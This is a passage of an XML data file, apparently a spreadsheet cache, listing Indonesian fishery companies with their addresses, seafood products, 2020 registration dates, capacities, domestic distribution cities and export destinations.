    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar, Kota Ambon"/>
    <m/>
  </r>
  <r>
    <n v="21807"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Manado, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21808"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Lemuru, Salem, Saba Mackerel, Sarden)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21809"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Lemuru, Salem, Saba Mackerel, Sarden)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21810"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Segar (Amberjack, Kod, Ekor Kuning)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Surakarta, Kota Semarang, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21811"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Amberjack, Kod, Ekor Kuning)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21812"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21813"/>
    <x v="577"/>
    <s v="PT. HOKI SINAR SUKSES"/>
    <s v="Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Bitung, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="21814"/>
    <x v="578"/>
    <s v="UD. MULTI SARANA NIAGA"/>
    <s v="Jl. Pendopo No. 07 Sembayat, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Bandeng Tanpa Duri"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kabupaten Malang, Kabupaten Gresik"/>
    <m/>
  </r>
  <r>
    <n v="21818"/>
    <x v="579"/>
    <s v="PT. PERIKANAN NUSANTARA CABANG SORONG"/>
    <s v="Jl. A. Yani No.24, Kel. Kampung Baru, Kec. Sorong Kota, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Beku (Bawal, Gulama, Lencam, Manyung, Kerapu, Kakap, Kurisi)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Hong Kong, Japan, Korea, Republic of, United States"/>
  </r>
  <r>
    <n v="21819"/>
    <x v="579"/>
    <s v="PT. PERIKANAN NUSANTARA CABANG SORONG"/>
    <s v="Jl. A. Yani No.24, Kel. Kampung Baru, Kec. Sorong Kota, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, Hong Kong, Japan, Korea, Republic of, Thailand, United States"/>
  </r>
  <r>
    <n v="21820"/>
    <x v="579"/>
    <s v="PT. PERIKANAN NUSANTARA CABANG SORONG"/>
    <s v="Jl. A. Yani No.24, Kel. Kampung Baru, Kec. Sorong Kota, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-08-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, Hong Kong, Japan, Korea, Republic of, Thailand, United States"/>
  </r>
  <r>
    <n v="21821"/>
    <x v="580"/>
    <s v="CV. KIRANA BAHARI INDONESIA"/>
    <s v="Jl. Rembang Industri II No.34, Kawasan Industri Rembang (PIER), Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Gurami, Bandeng, Patin, Nila)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="936000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar"/>
    <s v="Australia, China, Saudi Arabia"/>
  </r>
  <r>
    <n v="21822"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Beku (Bawal, Malong, Gulama, Talang-talang, Kakap, Ekor Kuning)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="21000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21823"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Segar"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="14400"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21824"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="7200"/>
    <s v="Kabupaten Belitung, Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21825"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21826"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="14400"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21827"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="7000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21828"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="7500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21829"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Segar (Senangin, Tenggiri, Parang-parang)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="21000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21830"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Beku (Senangin, Tenggiri, Parang-parang)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="7200"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21831"/>
    <x v="215"/>
    <s v="PT. PASTI BANGUN JAYA"/>
    <s v="Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Demersal Segar (Barramundi, Bawal, Gulama, Sembilang, Sebelah, Manyung, Kerapu, Jenaha, Kakap, Ekor Kuning)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="144000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="21833"/>
    <x v="581"/>
    <s v="PT, SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Kota Bitung, Kel, Manembo Nembo, Kec, Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Layang, Cakalang)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21834"/>
    <x v="581"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Kota Bitung, Kel. Manembo Nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Kakap)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21835"/>
    <x v="581"/>
    <s v="PT. SINAR BAHARI LAUTAN TIMUR INDONESIA"/>
    <s v="Kota Bitung, Kel. Manembo Nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="0"/>
    <s v="Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21836"/>
    <x v="242"/>
    <s v="PT. VESSEL FRESHFISH INDOMAKMUR"/>
    <s v="Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5 , Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Swanggi, Bawal Hitam, Gabus Laut, Gulama, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Gerot-Gerot, Layur, Beloso, Lemadang, Kakatua)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21837"/>
    <x v="242"/>
    <s v="PT. VESSEL FRESHFISH INDOMAKMUR"/>
    <s v="Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5 , Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21838"/>
    <x v="242"/>
    <s v="PT. VESSEL FRESHFISH INDOMAKMUR"/>
    <s v="Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5, Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="700000"/>
    <m/>
    <s v="Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21847"/>
    <x v="582"/>
    <s v="CV. CAHYA SAMUDRA INTERNASIONAL"/>
    <s v="Jl. Husein Sastranegara No.109 Room 15, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Pusat, Kota Bogor, Kota Bandung, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="21848"/>
    <x v="582"/>
    <s v="CV. CAHYA SAMUDRA INTERNASIONAL"/>
    <s v="Jl. Husein Sastranegara No.109 Room 15, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-09-28T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Pusat, Kota Bogor, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="21849"/>
    <x v="559"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Jl. Mundu Pesisir No. 33 Km 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-09-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kota Bekasi"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21850"/>
    <x v="402"/>
    <s v="MINA MANDIRI"/>
    <s v="Bokesan, Kel. Sindumartani, Kec. Ngemplak, Kab. Sleman&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Stik Lele"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="600"/>
    <s v="Kota Surakarta, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="21851"/>
    <x v="583"/>
    <s v="PT. BANGGAI INDO GEMILANG"/>
    <s v="Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Surabaya"/>
    <s v="China, Thailand, United States"/>
  </r>
  <r>
    <n v="21852"/>
    <x v="583"/>
    <s v="PT. BANGGAI INDO GEMILANG"/>
    <s v="Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Layur, Sukang, Beloso, Kakatua, Bawal, Talang-talang, Jenggot, Kakap, Tonang, Barramundi)"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21853"/>
    <x v="583"/>
    <s v="PT. BANGGAI INDO GEMILANG"/>
    <s v="Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Makerel, Layang, Cakalang)"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="21854"/>
    <x v="583"/>
    <s v="PT. BANGGAI INDO GEMILANG"/>
    <s v="Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Ikan Demersal Segar (Lencam, Kerapu, Layur, Sukang, Beloso, Kakatua, Bawal, Talang-talang, Jenggot, Kakap, Tonang, Barramundi)"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="300"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21855"/>
    <x v="583"/>
    <s v="PT. BANGGAI INDO GEMILANG"/>
    <s v="Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Surabaya"/>
    <s v="China"/>
  </r>
  <r>
    <n v="21856"/>
    <x v="39"/>
    <s v="PT, UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl, Tekno I Kawasan Industri Jababeka 3C No,3B, Kel, Pasir Gombong, Kec, Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Tembang, Layur, Kembung, Lemadang, Belanak, Selar, Selar Kuning, Tenggiri)"/>
    <d v="2020-08-24T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Surabaya, Kota Tangerang"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="21859"/>
    <x v="584"/>
    <s v="PT. DPO INDONESIA"/>
    <s v="Komplek Duta Indah Iconic Unit C 41 - 42, Jl. MH Thamrin Kebon Nanas RT 004 RW 002, Kel. Panunggangan Utara, Kec. Pinang, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="80000"/>
    <s v="Kota Jakarta Timur, Kabupaten Karawang, Kabupaten Bekasi, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21860"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan"/>
    <m/>
  </r>
  <r>
    <n v="21861"/>
    <x v="487"/>
    <s v="PT. ZHANG MARINA INDONESIA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Cobia, Marlin, Meka, Gindara, Layaran, Cakalang, Tenggiri)"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21862"/>
    <x v="487"/>
    <s v="PT. ZHANG MARINA INDONESIA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Kuwe, Kerapu, Layur, Kakatua, Bawal, Samge, Kakap, Kuro)"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21863"/>
    <x v="487"/>
    <s v="PT. ZHANG MARINA INDONESIA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21864"/>
    <x v="487"/>
    <s v="PT. ZHANG MARINA INDONESIA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Jl. Tuna Raya Blok D Kav No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2020-10-15T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="21866"/>
    <x v="585"/>
    <s v="PT. REVA INDO OVERSEAS"/>
    <s v="Jl. Letkol Sarofi Lrg II Pasar Serdang, Kel. Serdang Jaya, Kec. Betara, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Udang Kering"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Sri Lanka"/>
  </r>
  <r>
    <n v="21867"/>
    <x v="586"/>
    <s v="CV. ADI JAYA MANDIRI"/>
    <s v="Blok Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Kuwe, Kembung, Samge, Kuro, Salem)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21868"/>
    <x v="586"/>
    <s v="CV. ADI JAYA MANDIRI"/>
    <s v="Blok Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Barramundi, Mata Goyang, Bawal Hitam, Kambing-Kambing, Remang, Layur, Kakap)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21869"/>
    <x v="587"/>
    <s v="PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY"/>
    <s v="Penambulai, Desa Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Gulama, Kerapu, Lencam, Sebelah, Layur)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="21870"/>
    <x v="587"/>
    <s v="PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY"/>
    <s v="Penambulai, Desa Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Barakuda, Escolar, Lemadang)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="545000"/>
    <s v="Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="21871"/>
    <x v="587"/>
    <s v="PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY"/>
    <s v="Penambulai, Desa Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="450000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="21872"/>
    <x v="588"/>
    <s v="CV. GOLDEN SEAFRESH"/>
    <s v="Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="540000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21878"/>
    <x v="589"/>
    <s v="CV, BUMI INDO"/>
    <s v="Jl, Tirta Suam No,1, Kel, Kedundung, Kec, Magersari, Kota Mojokerto&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="33000000"/>
    <s v="Kabupaten Sidoarjo"/>
    <m/>
  </r>
  <r>
    <n v="21879"/>
    <x v="590"/>
    <s v="PT. KOIN BUMI"/>
    <s v="Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Gulama, Flounder, Pollock)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21880"/>
    <x v="590"/>
    <s v="PT. KOIN BUMI"/>
